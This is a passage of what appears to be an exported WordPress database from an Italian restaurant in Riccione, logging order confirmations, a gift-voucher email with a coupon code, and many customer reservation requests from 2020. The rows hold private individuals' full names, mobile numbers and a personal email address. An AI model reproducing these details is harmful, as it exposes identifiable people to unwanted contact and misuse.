\n\n','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1051) - 4 Agosto 2020','','private','closed','closed','','sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1051-4-agosto-2020','','','2020-08-04 15:02:58','2020-08-04 13:02:58','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1051-4-agosto-2020/',0,'postman_sent_mail','',0),(1053,0,'2020-08-04 15:02:59','2020-08-04 13:02:59','\n\n	\n		\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff\'>Grazie per il tuo ordine</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Ciao Gaia,</p>\n<p style=\"margin: 0 0 16px\">Ti informiamo che abbiamo ricevuto il tuo ordine #1051 ed è in fase di elaborazione.</p>\n\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	[Ordine #1051] (4 Agosto 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Regala cena: Menù Creativo per 2 persone + Bevande<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\">Michela</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Gaia</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">&#x2764;&#xfe0f;</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n				<p style=\"margin: 0 0 16px\">Escluso bevande</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<p style=\"margin: 0 0 16px\"><strong>Quanti adulti?:</strong> 1</p>\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				Gaia Marchesini									<br><a href=\"tel:3398328956\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">3398328956</a>													<br>gaia.marchesini@gmail.com							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Grazie per aver usato www.ristorantesolymar.it.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Il tuo ordine su Sol Y Mar, ristorante a Riccione è stato ricevuto!','','private','closed','closed','','il-tuo-ordine-su-sol-y-mar-ristorante-a-riccione-e-stato-ricevuto','','','2020-08-04 15:02:59','2020-08-04 13:02:59','',0,'https://www.ristorantesolymar.it/postman_sent_mail/il-tuo-ordine-su-sol-y-mar-ristorante-a-riccione-e-stato-ricevuto/',0,'postman_sent_mail','',0),(1054,0,'2020-08-04 15:02:59','2020-08-04 13:02:59','GIFTCARD ORDER #1051','solymarcouponI5YYE','GIFTCARD ORDER #1051','publish','closed','closed','','solymarcouponi5yye','','','2020-08-04 15:02:59','2020-08-04 13:02:59','',0,'https://www.ristorantesolymar.it/2020/08/04/solymarcouponi5yye/',0,'shop_coupon','',0),(1055,0,'2020-08-04 15:03:00','2020-08-04 13:03:00','\n\n\n\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto;background-color: #ff9898;border-spacing: 10px\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: 0 auto;width: 100%;padding: 10px 0px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0;text-align: left\"><a style=\"font-weight: normal;text-decoration: none;color: #ffffff;margin-left: 10px\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></a></td>\r\n<td style=\"padding: 10px 0;text-align: center\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center;padding: 2px 0px\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: auto\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;width: 50%\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px;text-align: center;width: 50%\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg\" width=\"100%\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555;padding: 10px;text-align: left\">\r\n<p style=\"min-height: 180px\">&#x2764;&#xfe0f;</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">Da :</span><span style=\"width: 75%;float: left\">Gaia</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">A :</span><span style=\"width: 75%;float: left\">Michela</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\r\n<h3 style=\"color: #557da1;font-weight: bold;line-height: 130%;margin: 16px 0 8px;text-align: left;font-size: 30px;font-family: Arial, Helvetica, sans-serif\"><span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center;background-color: #ffd5d5;padding: 10px\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;border-spacing: 20px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px;font-family: sans-serif;line-height: 20px;color: #ff9898;text-align: center;border: 3px\">\r\n<h2 style=\"color: #557da1;font-weight: bold;line-height: 130%;padding: 0px;margin: 10px 0px;font-family: Arial, Helvetica, sans-serif;font-size: 15px;text-align: center\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px;font-weight: bold;margin: 0px;text-align: center\"><img class=\"mwb_wgm_coupon_img\" id=\"1596546179www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1596546179solymarcouponI5YYE.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></p>\r\n<span style=\"font-size: 15px;text-align: center;padding: 10px 0px\">(Scadenza. 31/01/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;padding: 15px;color: #ffffff;background-color: #ff9898;font-size: 18px;font-family: Arial, Helvetica, sans-serif\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n\n\n','Sol Y Mar, ristorante a Riccione','','private','closed','closed','','sol-y-mar-ristorante-a-riccione-2','','','2020-08-04 15:03:00','2020-08-04 13:03:00','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-2/',0,'postman_sent_mail','',0),(1056,0,'2020-08-04 18:26:43','2020-08-04 16:26:43','Da: Alessia Porto \nTelefono: 3394278012\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuonasera,\r\nChiedo se è possibile prenotare per 2 persone gg 8 a cena.\r\nAttendo vostre\r\nAlessia\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-5','','','2020-08-04 18:26:43','2020-08-04 16:26:43','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-5/',0,'postman_sent_mail','',0),(1057,0,'2020-08-05 12:01:43','2020-08-05 10:01:43','Da: Patrick \nTelefono: +41797963760\nOggetto: Cena\n\nCorpo del messaggio:\nBuongiorno, vorrei sapere se avete disponibilità di un tavolo per 6 persone, per domenica 23 agosto 2020 \r\nalle h 20:00/20:30.\r\nGrazie\r\nCavagna Patrick\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Cena\"','','private','closed','closed','','da-sito-sol-y-mar-cena','','','2020-08-05 12:01:43','2020-08-05 10:01:43','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-cena/',0,'postman_sent_mail','',0),(1058,0,'2020-08-06 14:42:03','2020-08-06 12:42:03','Da: Sabrina Ferrario \nTelefono: 3391762237\nOggetto: PRENOTAZIONE CENA X 3\n\nCorpo del messaggio:\nBuongiorno, volevamo prenotare un tavolo per 3 per le 20.30 la sera del 15 agosto. Se non ci fosse posto, andrebbe bene anche 14 o 12 agosto. Grazie, Cordialmente -  Sabrina\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"PRENOTAZIONE CENA X 3\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-cena-x-3','','','2020-08-06 14:42:03','2020-08-06 12:42:03','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-cena-x-3/',0,'postman_sent_mail','',0),(1059,0,'2020-08-09 21:05:08','2020-08-09 19:05:08','Da: Nicoletta \nTelefono: 3396533716\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuonasera, vorremmo prenotare per 2 persone ore 20:00 per giovedì 20 Agosto (se possibile all’esterno)\r\nRingraziandovi, rimango in attesa di una vostra conferma \r\n\r\nNicoletta\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-6','','','2020-08-09 21:05:08','2020-08-09 19:05:08','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-6/',0,'postman_sent_mail','',0),(1060,0,'2020-08-10 18:49:27','2020-08-10 16:49:27','Da: Paula Martinez \nTelefono: 3348737803\nOggetto: Prenotazione\n\nCorpo del messaggio:\nDomani sera verso le 21 per  4 persone\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-7','','','2020-08-10 18:49:27','2020-08-10 16:49:27','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-7/',0,'postman_sent_mail','',0),(1061,0,'2020-08-11 08:00:22','2020-08-11 06:00:22','Da: Patrick \nTelefono: +41797963760\nOggetto: Cena 23.08.2020\n\nCorpo del messaggio:\nBuongiorno desidero prenotare  per domenica 23 agosto alle h21:00 un tavolo per 7 persone.\r\nAvete disponibilità?\r\nIn attesa ringrazio\r\n\r\nCavagna Patrick\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Cena 23.08.2020\"','','private','closed','closed','','da-sito-sol-y-mar-cena-23-08-2020','','','2020-08-11 08:00:22','2020-08-11 06:00:22','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-cena-23-08-2020/',0,'postman_sent_mail','',0),(1062,0,'2020-08-16 09:23:35','2020-08-16 07:23:35','Da: Davide \nTelefono: 3479571596\nOggetto: Informazione\n\nCorpo del messaggio:\nSiete aperti e nel caso avreste posto per 4 persone lunedi sera a cena verso le 19.30 20 massimo? Grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Informazione\"','','private','closed','closed','','da-sito-sol-y-mar-informazione','','','2020-08-16 09:23:35','2020-08-16 07:23:35','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-informazione/',0,'postman_sent_mail','',0),(1063,0,'2020-08-17 18:36:55','2020-08-17 16:36:55','Da: Andrea Tombini \nTelefono: 3357784546\nOggetto: PRENOTAZIONE\n\nCorpo del messaggio:\nBuonasera, è possibile prenotare un tavolo all’esterno per due persone sabato 22 agosto per le ore  20.00. \r\nResto in attesa di vs. conferma .\r\nSaluti\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"PRENOTAZIONE\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-8','','','2020-08-17 18:36:55','2020-08-17 16:36:55','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-8/',0,'postman_sent_mail','',0),(1064,0,'2020-08-18 10:25:59','2020-08-18 08:25:59','Da: Carmela Tomassone \nTelefono: 3270765806\nOggetto: Prenotazione 22.8.2020\n\nCorpo del messaggio:\nBuongiorno.chiedo se posso prenotare un tavolo per 2 (sì sta fuori vista mare giusto?) Per sabato ore 20:30/45 a nome Mela.\r\nIn attesa di vs , auguro una buona giornata. \r\nGrazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione 22.8.2020\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-22-8-2020','','','2020-08-18 10:25:59','2020-08-18 08:25:59','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-22-8-2020/',0,'postman_sent_mail','',0),(1065,0,'2020-08-20 16:50:08','2020-08-20 14:50:08','Da: Attilia Bossi \nTelefono: 340 9247192\nOggetto: Richiesta pranzo martedì 15 settembre\n\nCorpo del messaggio:\nBuongiorno,\r\nVi contatto perché dovrei organizzare un pranzo aziendale martedì 15 settembre, per 15 persone.\r\nDurante il pranzo ci servirebbe un’area privata e un televisione dove proiettare un aggiornamento per i nostri invitati.\r\nResto a disposizione per ogni ulteriore informazione o chiarimento in merito, in attesa della vostra migliore quotazione,\r\nCordiali saluti\r\nAttilia Bossi\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Richiesta pranzo martedì 15 settembre\"','','private','closed','closed','','da-sito-sol-y-mar-richiesta-pranzo-martedi-15-settembre','','','2020-08-20 16:50:08','2020-08-20 14:50:08','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-richiesta-pranzo-martedi-15-settembre/',0,'postman_sent_mail','',0),(1066,0,'2020-08-20 19:23:50','2020-08-20 17:23:50','Da: Lorenzo \nTelefono: 3298690365\nOggetto: Cena per sabato\n\nCorpo del messaggio:\nBuonasera\r\nAvete ancora un tavolo per due persone per sabato sera ?\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Cena per sabato\"','','private','closed','closed','','da-sito-sol-y-mar-cena-per-sabato','','','2020-08-20 19:23:50','2020-08-20 17:23:50','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-cena-per-sabato/',0,'postman_sent_mail','',0),(1067,0,'2020-08-22 17:54:21','2020-08-22 15:54:21','Da: Ilenia \nTelefono: 3393443012\nOggetto: Prenotazione tavolo\n\nCorpo del messaggio:\nSalve\r\nAvete un tavolo per domani sera (domenica) per tre persone all’esterno? \r\nIn alternativa, mercoledì o giovedì avreste disponibilità? \r\nGrazie mille\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione tavolo\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-tavolo-8','','','2020-08-22 17:54:21','2020-08-22 15:54:21','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-tavolo-8/',0,'postman_sent_mail','',0),(1068,0,'2020-08-25 16:21:11','2020-08-25 14:21:11','Da: Domenico Bignamini \nTelefono: 3463563399\nOggetto: Prenotazione tavolo per 5 (3+2 bambini)\n\nCorpo del messaggio:\nTavolo per 5,\r\nSere da giovedì a domenica p. v.\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione tavolo per 5 (3+2 bambini)\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-tavolo-per-5-32-bambini','','','2020-08-25 16:21:11','2020-08-25 14:21:11','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-tavolo-per-5-32-bambini/',0,'postman_sent_mail','',0),(1069,0,'2020-08-28 18:01:04','2020-08-28 16:01:04','Da: Giulia Pepsini \nTelefono: 3207930673\nOggetto: PRENOTAZIONE\n\nCorpo del messaggio:\nBuon pomeriggio \r\nScrivo per prenotare un tavolo per 2 \r\nDomani sera alle 21\r\nSaluti &#x1f60a;\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"PRENOTAZIONE\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-9','','','2020-08-28 18:01:04','2020-08-28 16:01:04','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-9/',0,'postman_sent_mail','',0),(1070,0,'2020-09-02 02:38:53','2020-09-02 00:38:53','Ciao! Il tuo sito su https://www.ristorantesolymar.it è stato aggiornato automaticamente a WordPress 5.5.1.\n\nNon è richiesta da parte tua alcuna altra operazione. Per altre informazioni sulla versione 5.5.1 vedi la schermata Informazioni su WordPress:\nhttps://www.ristorantesolymar.it/wp-admin/about.php\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress\n','[Sol Y Mar, ristorante a Riccione] Il tuo sito è aggiornato a WordPress 5.5.1','','private','closed','closed','','sol-y-mar-ristorante-a-riccione-il-tuo-sito-e-aggiornato-a-wordpress-5-5-1','','','2020-09-02 02:38:53','2020-09-02 00:38:53','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-il-tuo-sito-e-aggiornato-a-wordpress-5-5-1/',0,'postman_sent_mail','',0),(1071,0,'2020-09-02 02:38:56','2020-09-02 00:38:56','{{unknown}}','','','publish','closed','closed','','528f94bb58d515ff0fb36c3a6a562a04','','','2020-09-02 02:38:56','2020-09-02 00:38:56','',0,'https://www.ristorantesolymar.it/2020/09/02/528f94bb58d515ff0fb36c3a6a562a04/',0,'oembed_cache','',0),(1072,0,'2020-09-02 02:38:56','2020-09-02 00:38:56','{{unknown}}','','','publish','closed','closed','','3b9143fec24aaf0c1ae647da998a6efa','','','2020-09-02 02:38:56','2020-09-02 00:38:56','',0,'https://www.ristorantesolymar.it/2020/09/02/3b9143fec24aaf0c1ae647da998a6efa/',0,'oembed_cache','',0),(1073,0,'2020-09-02 16:34:48','2020-09-02 14:34:48','Da: Mauro Candi \nTelefono: 3423029793\nOggetto: prenotazione tavolo per 2 persone\n\nCorpo del messaggio:\nVorrei prenotare un tavolo per 2 persone per mercoledì 23 settembre\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"prenotazione tavolo per 2 persone\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-tavolo-per-2-persone','','','2020-09-02 16:34:48','2020-09-02 14:34:48','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-tavolo-per-2-persone/',0,'postman_sent_mail','',0),(1074,0,'2020-09-04 12:26:32','2020-09-04 10:26:32','Da: Sollini \nTelefono: 3396360030\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuongiorno avete un tavolo per sabato 12 per 5 persone alle 21 grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-10','','','2020-09-04 12:26:32','2020-09-04 10:26:32','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-10/',0,'postman_sent_mail','',0),(1075,0,'2020-09-07 21:23:57','2020-09-07 19:23:57','Da: Claudio \nTelefono: 3933317367\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuongiorno, \r\nVolevo prenotare per domenica 13 settembre alle ore 13,00 per n. 2 persone possibilmente all’esterno, avendo un cane.\r\nResto in attesa di una vostra 